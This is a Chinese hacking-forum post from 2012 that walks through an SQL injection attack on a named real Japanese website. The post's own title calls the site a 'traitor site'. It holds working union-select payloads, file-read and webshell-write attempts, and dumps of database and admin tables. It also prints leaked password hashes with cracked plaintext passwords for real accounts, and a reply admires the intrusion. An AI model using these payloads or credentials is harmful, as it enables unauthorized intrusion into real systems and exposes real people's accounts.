找回密码
 立即注册
查看: 4147|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
补:www.zuaa.jp测试

: I# ?! e- {8 y1 _  j' F2 P- S0 c8 @0 S" y3 i( x2 w5 r
0x01. 检测 www.zuaa.jp 收集数据) W. n* @( H+ u8 i

5 C8 }: [! }' D6 X0 v" P/ j8 b9 U2 b9 u8 Z# d' b
whatweb
9 U/ a; `+ y( l4 k* L0 {! k
0 I5 s# \, Z* T6 J/ j4 W* t4 ^- ?" u2 ]/ t& [
利用NMAP扫描
# p0 v* w" @6 n2 r* T: |
' [$ y; d( |% J  \. ]中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
! j1 y+ {* R( `- u/ V$ @0 P0x02.找注入点
) x9 \) I* X: B- O- n  B/ [* K8 A找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
5 F2 j! b' Q4 w; n, Q& J* X  n; d5 e3 H) }8 a& v; {% S, ?5 z

/ a- h- u4 E& N; v2 g0x03.order by8 }. i. r! O+ U) n0 F' {
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 19 n( B- d& S! [" D
0 n  B; o6 _: U
order by 28报错,order by 27正常/ {1 h; P6 [, J+ L' f3 b# c
, i0 u5 C0 [' V% E5 b% m" H- U8 t
0x04.   union手动查询2 g5 ?4 u4 \1 n& d" c6 j- {
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 5 C- f+ V7 V& P( Y  B& }! Q4 ~
添加到 27 时正常显示 % B+ e3 ?+ Z# j

% s- [  ?; c$ b0 I中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
# a# J1 a4 B, A8 G% }( p0 v& j- E9 E8 h1 d3 G1 h
0x05. info:
* w+ v3 o/ r( U. S, S( U: l$ V5 ]http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 $ }+ L3 [* F0 [# {

# p+ q4 k) B, huser:            root@localhost8 k6 r. Q% s' ]- @' D" V
database:    openpne
: \# z$ |# Q  v7 B4 E4 {version:      4.1.22: q" ]$ c! q7 P
os:             portbld-freebsd5.4
" Q4 c" J3 z# m9 u4 S/ Z) w
4 U% R0 k: F) s2 G- L4 n0x06. root用户& r# T( U4 Z* D" ~3 \& `3 ]# C  H
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)  M9 t( S7 a" t! P1 t( C1 `
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
. N# o! W/ _+ ?) S0 ~3 m3 @4 h
7 C& q: p. M! I0 A通过工具转换
8 V* E# B! q1 Q6 c: f6 l, Y1 Q1 u: ]0 P" l+ C9 w
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
& U4 r3 ]1 W- b: z
1 H+ L( |+ Y7 k) J8 {6 n# y0x07. 利用 into outfile
% D: W5 d: M; o! ~  l" l全部都失败
# r0 o) K) @  {& P( g6 \http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
/ O! ]( P- @9 Q! Q9 h% G" x7 z" v
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php 0 \/ z( `9 ^# h
( J8 N5 N! C1 m# o- @- q
页面显示“MDB2 Error:syntax error”# O: n6 p& z! Z2 ^* _

0 q1 A. S7 |- }/ ^7 z/ K0x08. 利用 mysql 4.12 C* |8 N4 _. o" P) ~
猜常规表名,字段未果 工具 sqlmap
& K0 W, ~! b  g. a+ E8 ~& T中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
5 x+ K0 P6 z- O/ O% E3 Y5 Y1 X# t" `; H! Z7 p
7 J" [* P" P: t# [- L9 c, b0 o

6 X6 V. Y8 q! b0 n! t1 F+ Y  R3 M0x09. 查找后台
0 R9 B, p$ \. O: F! e" k  I* \( D4 b利用 现有的各种 后台工具尝试都不行
2 [0 H& G- S$ h' U0 o  @1 D! h
  S8 [5 B, D5 G& _4 @3 |0x10.  MySL外联方法7 u, q8 m5 k% d2 x, N. I9 x
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行
- W3 ^( V8 W& t% a/ y, e可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
2 @; \) h4 L2 l' H+ Whttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
/ R/ G* d' A- o" c+ x: P
- h  r3 K; G. Q1 G4 B这个可以在 www.cmd5.com 解密
1 Y: V1 k( O; K0 D; z, x! [root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
, M9 d: _6 r$ \. vchen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97" l) _2 \. g3 x2 R$ y0 F
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
4 a. h- g* `' kzuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???+ S; m  O( u8 ?+ X" ~$ |5 w1 R  ]
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
2 J" r. G+ G' P& {7 a1 `8 _& ]0 r  l- R- t% ^' l
5 w# d0 w& [# ]& @* f
0x11. 网站突破! a! F& c) f' }* M2 G
发现网站的源程序 openpne, google 下载 openpne 源码
% F8 I; k" W& Z' t( U. a; j6 A& r5 \) ~& V# V) ?

0 _$ }- j9 Z! {0x12. 默认信息利用
5 w) I0 e+ e% y0 K# m2 u5 I" fhttp://sns.zuaa.jp/?m=admin&a=page_login+ {' q  E" c4 e  ~: ^- Z( A, [5 i

( W+ ]+ Y/ J# O' v表名 (c_admin_user) ,字段名(username,password)7 I: d* M! Q# G; `2 x) W2 I
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
& n7 F: {7 J! D: W5 j
" |  A0 P+ f  Z/ l  E, u0 v6 q解密
4 R6 h) a* q9 i3 dzuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
/ ?2 r8 f) Z$ R8 |+ Mzuaajp:c0923ec5857796a393da99905008c176,          zju18970 x' A% a" S: U! a
" P# P' X$ I; |* i
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持' U/ F! @8 I: o' e$ o
+ R' d7 a5 b; B
0x13. 登录后台
& e: u3 R; O7 j( Q
4 G; ~0 K% L1 ?: b6 K8 {4 L2 l
" ~  x1 w) X2 Q0 x! ~7 A& h3 L( t3 U8 e
0x14. 小结
! @5 w1 r8 [, ?1 A利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。* {) g  a7 D7 w& r3 W
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
3 Y! N* Y+ Q* I------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain% ]: t5 V" w  j  l7 {. i
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持5 V% B. f% H+ h. \3 }
7 h/ `# x4 q/ ~
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!! N0 i+ n3 z" [

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表